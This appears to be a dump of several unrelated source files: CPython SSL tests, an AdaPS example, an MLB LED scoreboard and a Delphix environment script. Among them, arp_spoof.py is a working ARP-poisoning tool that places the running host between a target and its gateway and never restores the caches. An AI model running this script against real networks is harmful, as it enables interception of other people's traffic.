server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # other_context's certificate (SIGNED_CERTFILE2) was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
            if alg1 not in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
arp_spoof.py
|
#!/usr/bin/env python3
from scapy.all import *
import sys
import threading
def arp_flood(packet1, packet2):
    print('Spamming ARP packets...')
    while True:
        send(packet1, verbose=0)
        send(packet2, verbose=0)
def get_mac(ip):
    # Scapy ships a similar helper, getmacbyip(), but it often times out;
    # sending the ARP request directly tends to produce more consistent results.
    mac_packet = ARP(pdst=ip)
    reply = sr1(mac_packet, timeout=2, verbose=0)
    if reply is None:
        sys.exit('No ARP reply from ' + ip + '; is the host up?')
    return reply.hwsrc
def main():
gw = conf.route.route("0.0.0.0")[2]
gw_mac = get_mac(gw)
print('GATEWAY IP: ' + str(gw))
print('GATEWAY MAC: ' + str(gw_mac))
    if len(sys.argv) < 2:
        sys.exit('Usage: ' + sys.argv[0] + ' <target_ip>')
    target = sys.argv[1]
target_mac = get_mac(target)
print('TARGET IP: ' + str(target))
print('TARGET MAC: ' + str(target_mac))
#Prepare the spoofed packets
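    # hwsrc is left at its default (this machine's MAC), so the gateway is told
    # that the target's IP lives at the attacker's MAC and vice versa, wedging
    # this host into the middle of their traffic.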
    packet_gateway = ARP(pdst=str(gw), hwdst=str(gw_mac), psrc=str(target))
    packet_target = ARP(pdst=str(target), hwdst=str(target_mac), psrc=str(gw))
    t = threading.Thread(target=arp_flood, args=(packet_gateway, packet_target))
t.start()
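    # Note: the flood thread never exits and is not a daemon, so the process
    # keeps spoofing until it is killed; the poisoned ARP caches are not restored.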
if __name__=="__main__":
main()
|
example.py
|
#!/usr/bin/env python3
import os
import torch
import torch.distributed as dist
import numpy as np
from torch.multiprocessing import Process
import adaps
from signal import signal, SIGINT
from sys import exit
import threading
num_nodes = 4 # number of nodes
num_workers_per_node = 2 # number of worker threads per node
num_keys = 1000 # number of keys
vpk = 2 # length of the parameter vector that one key holds
localip = '127.0.0.1'
port = '9091'
def run_worker(worker_id, rank, kv):
if worker_id == 0:
print("""\n
---------------------------------------------------
Run example with PyTorch tensors
----------------------------------------------------
""")
worker_torch(worker_id, rank, kv)
kv.barrier() # wait for all workers to finish
if worker_id == 0:
print("""\n
---------------------------------------------------
Run example with NumPy arrays
----------------------------------------------------
""")
worker_numpy(worker_id, rank, kv)
kv.barrier() # wait for all workers to finish
kv.finalize()
def worker_numpy(worker_id, rank, kv):
"""Example worker, using numpy arrays"""
print("run worker " + str(worker_id) + " on server rank " + str(rank) + ", using NumPy arrays")
try:
np.random.seed(worker_id)
keys = np.array([1,2,3,4])
keys2 = np.array([1,333,666,960])+worker_id
vals = np.ones((len(keys)*vpk), dtype=np.float32)
pushvals = np.random.rand(len(keys2)*vpk).astype(np.float32)
setvals = np.ones((len(keys)*vpk), dtype=np.float32)
# pull
kv.pull(keys, vals)
print("worker " + str(worker_id) + " pulled " + str(vals))
# localize
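        # (Assumed from the AdaPS API names: register intent for keys2 at the next
        # clock tick, advance the local clock, and wait until the keys have been
        # localized before pushing below.)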
kv.intent(keys2, kv.current_clock()+1)
kv.advance_clock()
kv.wait_sync()
# push
print("worker " + str(worker_id) + " pushes " + str(pushvals))
kv.push(keys2, pushvals)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after push")
# set
kv.set(keys2, setvals)
# asynchronous operations
kv.push(keys2, pushvals, True)
kv.pull(keys2, pushvals, True)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after set")
# asynchronous operations
ts1 = kv.push(keys2, pushvals, True)
ts2 = kv.pull(keys2, vals, True)
kv.wait(ts1) # optional
kv.wait(ts2) # optional
## pull the key that holds a vector of other length
longer_key = np.array([400])
longer_vals = np.ones((10), dtype=np.float32)
kv.pull(longer_key, longer_vals)
## sampling
N = 8
s1 = kv.prepare_sample(N, kv.current_clock())
samplekeys = np.zeros(N, dtype=np.int64)
samplevals = np.ones((len(samplekeys)*vpk), dtype=np.float32)
kv.pull_sample(s1, samplekeys, samplevals)
print("sampled keys in w" + str(worker_id) + ": " + str(samplekeys))
except Exception as e:
print(e)
os._exit(1)
def worker_torch(worker_id, rank, kv):
"""Example worker, using PyTorch tensors """
print("run worker " + str(worker_id) + " on server rank " + str(rank) + ", using PyTorch tensors")
try:
np.random.seed(worker_id)
torch.manual_seed(worker_id)
keys = torch.LongTensor([1,2,3,4])
keys2 = torch.LongTensor([1,333,666,960])+worker_id
vals = torch.ones((len(keys)*vpk), dtype=torch.float32)
pushvals = torch.from_numpy(np.random.rand(len(keys2)*vpk).astype(np.float32))
setvals = torch.ones((len(keys)*vpk), dtype=torch.float32)
# pull
kv.pull(keys, vals)
print("worker " + str(worker_id) + " pulled " + str(vals))
# localize
kv.intent(keys2, kv.current_clock()+1)
kv.advance_clock()
kv.wait_sync()
# push
print("worker " + str(worker_id) + " pushes " + str(pushvals))
kv.push(keys2, pushvals)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after push")
# set
kv.set(keys2, setvals)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after set")
# asynchronous operations
ts1 = kv.push(keys2, pushvals, True)
ts2 = kv.pull(keys2, vals, True)
kv.wait(ts1) # optional
kv.wait(ts2) # optional
## pull the key that holds a vector of other length
longer_key = torch.LongTensor([400])
longer_vals = torch.ones((10), dtype=torch.float32)
kv.pull(longer_key, longer_vals)
except Exception as e:
print(e)
os._exit(1)
def init_scheduler(dummy, num_nodes):
os.environ['DMLC_NUM_SERVER'] = str(num_nodes)
os.environ['DMLC_ROLE'] = 'scheduler'
os.environ['DMLC_PS_ROOT_URI'] = localip
os.environ['DMLC_PS_ROOT_PORT'] = port
adaps.scheduler(num_keys, num_workers_per_node)
def init_node(rank, num_nodes):
"""Start up an AdaPS node (server + multiple worker threads)"""
os.environ['DMLC_NUM_SERVER'] = str(num_nodes)
os.environ['DMLC_ROLE'] = 'server'
os.environ['DMLC_PS_ROOT_URI'] = localip
os.environ['DMLC_PS_ROOT_PORT'] = port
adaps.setup(num_keys, num_workers_per_node)
# in this example, there are `num_keys` keys and all keys except one
# hold a vector of length `vpk`. To indicate this to AdaPS, we pass
# an array of length `num_keys`, in which each key holds the length
# of the parameter vector
value_lengths = torch.ones(num_keys)*vpk
value_lengths[400] = 10 ## one key holds a vector of other length
s = adaps.Server(value_lengths)
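    # Configure server-side sampling: keys are drawn uniformly, with replacement,
    # from the lower half of the key range; workers use this via prepare_sample()
    # and pull_sample() (see worker_numpy above).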
s.enable_sampling_support(scheme="local", with_replacement=True,
distribution="uniform", min=0, max=int(num_keys/2))
threads = []
for w in range(num_workers_per_node):
worker_id = rank * num_workers_per_node + w
t = threading.Thread(target=run_worker, args=(worker_id, rank, adaps.Worker(w, s)))
t.start()
threads.append(t)
for t in threads:
t.join()
# shutdown AdaPS node
s.shutdown()
def kill_processes(signal_received, frame):
"""Kills all started AdaPS processes"""
print('\nSIGINT or CTRL-C detected. Shutting down all processes and exiting..')
for p in processes:
p.kill()
exit(0)
processes = []
if __name__ == "__main__":
# catch interrupt (to shut down AdaPS processes)
signal(SIGINT, kill_processes)
# launch AdaPS scheduler
p = Process(target=init_scheduler, args=(0, num_nodes))
p.start()
processes.append(p)
# launch AdaPS processes
for rank in range(num_nodes):
p = Process(target=init_node, args=(rank, num_nodes))
p.start()
processes.append(p)
for p in processes:
p.join()
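# Illustrative note (not part of the original example): launching this script
# with `python3 <script>.py` spawns one scheduler process plus `num_nodes`
# server processes; each server process starts `num_workers_per_node` worker
# threads via `init_node`, so the total number of workers is
# num_nodes * num_workers_per_node. The variables referenced here (num_nodes,
# num_workers_per_node, localip, port, vpk, num_keys, run_worker) are assumed
# to be defined earlier in this example file.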
|
main.py
|
import sys
if sys.version_info <= (3, 5):
print("Error: Please run with python3")
sys.exit(1)
import logging
import os
import threading
import time
from PIL import Image
import debug
from data import Data
from data.config import Config
from renderers.main import MainRenderer
from utils import args, led_matrix_options
from version import SCRIPT_NAME, SCRIPT_VERSION
try:
from rgbmatrix import RGBMatrix, __version__
emulated = False
except ImportError:
from RGBMatrixEmulator import RGBMatrix, version
emulated = True
def main(matrix, config_base):
# Read scoreboard options from config.json if it exists
config = Config(config_base, matrix.width, matrix.height)
logger = logging.getLogger("mlbled")
if config.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
# Print some basic info on startup
debug.info("%s - v%s (%sx%s)", SCRIPT_NAME, SCRIPT_VERSION, matrix.width, matrix.height)
if emulated:
debug.log("rgbmatrix not installed, falling back to emulator!")
debug.log("Using RGBMatrixEmulator version %s", version.__version__)
else:
debug.log("Using rgbmatrix version %s", __version__)
# Draw startup screen
logo = "assets/mlb-w" + str(matrix.width) + "h" + str(matrix.height) + ".png"
# MLB logo image disabled when using the emulator, for now.
# see: https://github.com/ty-porter/RGBMatrixEmulator/issues/9#issuecomment-922869679
if os.path.exists(logo) and not emulated:
logo = Image.open(logo)
matrix.SetImage(logo.convert("RGB"))
logo.close()
# Create a new data object to manage the MLB data
# This will fetch initial data from MLB
data = Data(config)
# create render thread
render = threading.Thread(target=__render_main, args=[matrix, data], name="render_thread", daemon=True)
time.sleep(1)
render.start()
screen = data.get_screen_type()
if screen == "news":
__refresh_offday(render, data)
elif screen == "standings":
__refresh_standings(render, data)
else:
__refresh_games(render, data)
def __refresh_offday(render_thread, data): # type: (threading.Thread, Data) -> None
debug.log("Main has selected the offday information to refresh")
while render_thread.is_alive():
time.sleep(30)
data.refresh_weather()
data.refresh_news_ticker()
def __refresh_standings(render_thread, data): # type: (threading.Thread, Data) -> None
if data.standings.populated():
debug.log("Main has selected the standings to refresh")
while render_thread.is_alive():
time.sleep(30)
data.refresh_standings()
else:
__refresh_offday(render_thread, data)
def __refresh_games(render_thread, data): # type: (threading.Thread, Data) -> None
debug.log("Main has selected the game and schedule information to refresh")
starttime = time.time()
promise_game = data.schedule.games_live()
while render_thread.is_alive():
time.sleep(0.5)
data.refresh_schedule()
if data.config.standings_no_games:
if not data.schedule.games_live():
data.refresh_standings()
continue
# make sure a game is populated
elif not promise_game:
promise_game = True
data.advance_to_next_game()
rotate = data.should_rotate_to_next_game()
if data.schedule.games_live() and not rotate:
data.refresh_game()
endtime = time.time()
time_delta = endtime - starttime
rotate_rate = data.config.rotate_rate_for_status(data.current_game.status())
if time_delta >= rotate_rate and data.scrolling_finished:
starttime = time.time()
if rotate:
data.advance_to_next_game()
def __render_main(matrix, data):
MainRenderer(matrix, data).render()
if __name__ == "__main__":
# Check for led configuration arguments
command_line_args = args()
matrixOptions = led_matrix_options(command_line_args)
# Initialize the matrix
matrix = RGBMatrix(options=matrixOptions)
try:
config, _ = os.path.splitext(command_line_args.config)
main(matrix, config)
except:
debug.exception("Untrapped error in main!")
sys.exit(1)
finally:
matrix.Clear()
|
dx_environment.py
|
#!/usr/bin/env python
#Corey Brune 08 2016
#This script creates an environment
#requirements
#pip install docopt delphixpy
#The below doc follows the POSIX compliant standards and allows us to use
#this doc to also define our arguments for the script.
"""Create Host Environment
Usage:
dx_environment.py (--type <name> --env_name <name> --host_user <username> \
--ip <address> [--toolkit <path_to_the_toolkit>] [--ase --ase_user <name> --ase_pw <name>] \
|--update_ase_pw <name> --env_name <name> | --update_ase_user <name> --env_name <name> \
| --delete <env_name> | --refresh <env_name> | --list)
[--logdir <directory>][--debug] [--config <filename>] [--connector_name <name>]
[--pw <password>][--engine <identifier>][--all] [--poll <n>]
dx_environment.py (--update_host --old_host_address <name> --new_host_address <name>) [--logdir <directory>][--debug] [--config <filename>]
dx_environment.py ([--enable]|[--disable]) --env_name <name> [--logdir <directory>][--debug] [--config <filename>]
dx_environment.py -h | --help | -v | --version
Create a Delphix environment. (current support for standalone environments only)
Examples:
dx_environment.py --engine landsharkengine --type linux --env_name test1 --host_user delphix --pw delphix --ip 182.1.1.1 --toolkit /var/opt/delphix
dx_environment.py --update_ase_pw newPasswd --env_name test1
dx_environment.py --type linux --env_name test1 --host_user delphix --pw delphix --ip 182.1.1.1 --toolkit /var/opt/delphix
dx_environment.py --update_host --old_host_address 10.0.3.60 --new_host_address 10.0.3.61
dx_environment.py --type linux --env_name test1 --host_user delphix --pw delphix --ip 182.1.1.1 --toolkit /var/opt/delphix --ase --ase_user sa --ase_pw delphixpw
dx_environment.py --type windows --env_name SOURCE --host_user delphix.local\\administrator --ip 10.0.1.50 --toolkit foo --config dxtools.conf --pw 'myTempPassword123!' --debug --connector_name 10.0.1.60
dx_environment.py --enable --env_name SOURCE
dx_environment.py --disable --env_name SOURCE
dx_environment.py --list
Options:
--type <name> The OS type for the environment
--env_name <name> The name of the Delphix environment
--ip <addr> The IP address of the Delphix environment
--list List all of the environments for a given engine
--toolkit <path> Path of the toolkit. Required for Unix/Linux
--host_user <username> The username on the Delphix environment
--delete <environment> The name of the Delphix environment to delete
--update_ase_pw <name> The new ASE DB password
--refresh <environment> The name of the Delphix environment to refresh. Specify "all" to refresh all environments
--pw <password> Password of the user
--connector_name <environment> The name of the Delphix connector to use. Required for Windows source environments
--update_ase_user <name> Update the ASE DB username
--ase Flag to enable ASE environments
--ase_user <name> The ASE DB username
--ase_pw <name> Password of the ASE DB user
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--engine <type> Identifier of Delphix engine in dxtools.conf.
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_environment.log]
-h --help Show this screen.
-v --version Show version.
--update_host Update the host address for an environment
--old_host_address <name> The current name of the host, as registered in Delphix. Required for update_host
--new_host_address <name> The desired name of the host, as registered in Delphix. Required for update_host
--enable Enable the named environment
--disable Disable the named environment
"""
VERSION="v.0.3.612"
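# Illustrative note (assumption, not from the original script): docopt parses
# the usage docstring above into a plain dictionary, so an invocation such as
#   dx_environment.py --list --engine myengine
# yields arguments['--list'] == True and arguments['--engine'] == 'myengine',
# while flags that were not supplied appear in the dict as False/None.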
from docopt import docopt
from os.path import basename
import sys
import traceback
from time import sleep, time
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import host
from delphixpy.v1_8_0.web.vo import UnixHostEnvironment
from delphixpy.v1_8_0.web.vo import ASEHostEnvironmentParameters
from delphixpy.v1_8_0.web.vo import HostEnvironmentCreateParameters
from delphixpy.v1_8_0.web.vo import WindowsHostEnvironment
from delphixpy.v1_8_0.web.vo import WindowsHost
from delphixpy.v1_8_0.web.vo import UnixHost
from lib.DlpxException import DlpxException
from lib.GetSession import GetSession
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import find_obj_name
from lib.GetReferences import find_all_objects
from lib.DxLogging import logging_est
from lib.DxLogging import print_info
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
def enable_environment(dlpx_obj, env_name):
"""
Enable the given host
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = find_obj_by_name(dlpx_obj.server_session,
environment, env_name)
try:
environment.enable(dlpx_obj.server_session,env_obj.reference)
print('Attempting to enable {}'.format(env_name))
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Enabling the host {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
def disable_environment(dlpx_obj,env_name):
"""
Disable the given host
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = find_obj_by_name(dlpx_obj.server_session,
environment, env_name)
try:
environment.disable(dlpx_obj.server_session,env_obj.reference)
print('Attempting to disable {}'.format(env_name))
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Disabling the host {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
